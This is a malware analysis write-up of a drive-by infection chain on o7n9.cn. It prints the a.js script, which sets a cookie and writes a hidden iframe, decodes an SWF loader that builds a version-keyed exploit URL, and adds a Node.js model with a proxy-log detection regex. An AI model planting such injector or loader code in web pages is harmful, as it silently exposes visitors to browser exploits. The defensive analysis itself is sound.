o7n9.cn/a.js

The content of a.js essentially writes a hidden 10x10 iframe pointing at 456.htm. The write is gated on a marker cookie that expires after 24 hours, so each visitor is hit once per day (a second visit during analysis shows nothing unless the cookie is cleared):

window.status="";                                    // blank the status bar
var cookieString = document.cookie;
var start = cookieString.indexOf("0wen0wen=");      // marker cookie: victim already hit
if (start != -1)
{}                                                   // cookie present: do nothing this visit
else
{
    // mark the victim for 24 hours, then inject the loader page once
    var expires = new Date();
    expires.setTime(expires.getTime() +  24 * 1 * 60 * 60 * 1000);
    document.cookie = "0wen0wen=funny;expires=" + expires.toGMTString();
    try{
        document.write("<iframe width=10 height=10 src=http://o7n9.cn/456.htm></iframe>");
    }
    catch(e)
    {
    }
}

The content of 456.htm retrieves 2 SWF files, 4561.swf and 4562.swf. Dumping the first one with swftools (the PROTECT tag only tells the Flash authoring tool to refuse to import the file; it does not hinder swfdump):

swfdump -D 4561.swf
[HEADER]        File version: 8
[HEADER]        File is zlib compressed. Ratio: 96%
[HEADER]        File size: 164 (Depacked)
[HEADER]        Frame rate: 12.000000
[HEADER]        Frame count: 1
[HEADER]        Movie width: 550.00
[HEADER]        Movie height: 400.00
[045]         4 FILEATTRIBUTES
[009]         3 SETBACKGROUNDCOLOR (ff/ff/ff)
[018]        31 PROTECT
[00c]        89 DOACTION
(   50 bytes) action: Constantpool(5 entries) String:"fVersion" String:"/:$version" String:"http://o7n9.cn/" String:"i.swf" String:"_root"
(    4 bytes) action: Push Lookup:0 ("fVersion") Lookup:1 ("/:$version")
(    0 bytes) action: GetVariable
(    0 bytes) action: DefineLocal
(    4 bytes) action: Push Lookup:2 ("http://o7n9.cn/") Lookup:0 ("fVersion")
(    0 bytes) action: GetVariable
(    0 bytes) action: Add2
(    2 bytes) action: Push Lookup:3 ("i.swf")
(    0 bytes) action: Add2
(    2 bytes) action: Push Lookup:4 ("_root")
(    0 bytes) action: GetVariable
(    1 bytes) action: GetUrl2 64
(    0 bytes) action: Stop
(    0 bytes) action: End
[001]         0 SHOWFRAME 1 (00:00:00,000)
[000]         0 END

So the SWF loader reads the Flash Player version string ($version, of the form "WIN 9,0,115,0"), concatenates "http://o7n9.cn/" + version + "i.swf" and loads the result into _root (GetUrl2 with flag 64, i.e. loadMovie). The 2 SWF files thus retrieve the actual Flash exploit by using the player version as part of the filename, which lets the server hand out an exploit matching the exact player build. It also means the second-stage filename differs per victim: when hunting for it in proxy logs, or when fetching a sample by hand, the request has to carry a realistic $version string (with the space percent-encoded) or it will not hit the same resource.
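The chain's two decisions, the cookie gate in a.js and the version-keyed URL built by the ActionScript in 4561.swf, modelled in Node.js as an added example (this is the editor's code, not anything from the o7n9.cn pages). The $version values, the proxy-log lines and the hunting regex are all constructed for illustration; nothing here touches the network.

```javascript
// Added example: models the a.js cookie gate and the 4561.swf URL construction,
// then applies the result to constructed proxy-log lines. Run with: node chain.js

// --- 1. The cookie gate from a.js ------------------------------------------
// The iframe is only written when document.cookie lacks "0wen0wen=", and the
// cookie a.js sets expires 24 h later, so each victim is hit once per day.
const GATE_COOKIE = "0wen0wen";
const GATE_TTL_MS = 24 * 60 * 60 * 1000;

// Returns "inject" when a.js would write the iframe, "skip" when it would not.
function gateDecision(cookieString) {
  // a.js tests indexOf("0wen0wen=") != -1, so any cookie carrying that name,
  // whatever its value, suppresses the iframe.
  return cookieString.indexOf(GATE_COOKIE + "=") === -1 ? "inject" : "skip";
}

// The cookie string a.js writes, given the current time in ms since the epoch
// (toUTCString is the modern name for the toGMTString the script calls).
function gateCookie(nowMs) {
  const expires = new Date(nowMs + GATE_TTL_MS);
  return GATE_COOKIE + "=funny;expires=" + expires.toUTCString();
}

// --- 2. The URL built by the ActionScript in 4561.swf ----------------------
// Constant pool: "http://o7n9.cn/" + $version + "i.swf", loaded into _root.
// $version has the form "WIN 9,0,115,0" (platform tag, a space, four
// comma-separated numbers); the versions used below are illustrative.
function stageUrlFor(flashVersion) {
  return "http://o7n9.cn/" + flashVersion + "i.swf";
}

// What goes on the wire: the player percent-encodes the space, so the request
// line contains e.g. "WIN%209,0,115,0i.swf".
function wireUrlFor(flashVersion) {
  return encodeURI(stageUrlFor(flashVersion));
}

// --- 3. Hunting the second-stage request in proxy logs ---------------------
// Matches the encoded (or raw) version-keyed filename for any player version.
// Assumption: the pattern is derived from the string construction above; it is
// not a published signature.
const STAGE_RE = /o7n9\.cn\/[A-Z]+(?:%20| )\d+,\d+,\d+,\d+i\.swf/;

// Constructed sample log lines (squid-style), not real traffic.
const SAMPLE_LOG = [
  "1215100001.123 312 10.0.0.5 TCP_MISS/200 1180 GET http://o7n9.cn/a.js - DIRECT/1.2.3.4 application/x-javascript",
  "1215100002.456 401 10.0.0.5 TCP_MISS/200 2210 GET http://o7n9.cn/456.htm - DIRECT/1.2.3.4 text/html",
  "1215100003.789 280 10.0.0.5 TCP_MISS/200 164 GET http://o7n9.cn/4561.swf - DIRECT/1.2.3.4 application/x-shockwave-flash",
  "1215100004.012 350 10.0.0.5 TCP_MISS/200 9823 GET http://o7n9.cn/WIN%209,0,115,0i.swf - DIRECT/1.2.3.4 application/x-shockwave-flash",
  "1215100005.345 150 10.0.0.7 TCP_HIT/200 5120 GET http://example.org/banner.swf - NONE/- application/x-shockwave-flash",
];

// Returns the log lines carrying a version-keyed exploit request, with the
// player version the victim reported (decoded) pulled out for triage.
function findStageRequests(lines) {
  return lines
    .filter((line) => STAGE_RE.test(line))
    .map((line) => {
      const m = line.match(/o7n9\.cn\/([A-Z]+(?:%20| )[\d,]+)i\.swf/);
      return { line: line, flashVersion: decodeURIComponent(m[1]) };
    });
}

console.log(gateDecision(""), gateDecision("0wen0wen=funny"));
console.log(wireUrlFor("WIN 9,0,115,0"));
console.log(findStageRequests(SAMPLE_LOG));
```

The decoded flashVersion field is the useful triage output: it tells you which player build the victim exposed, and therefore which version-specific exploit file the server handed out, so a sample can be fetched with exactly that $version string.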
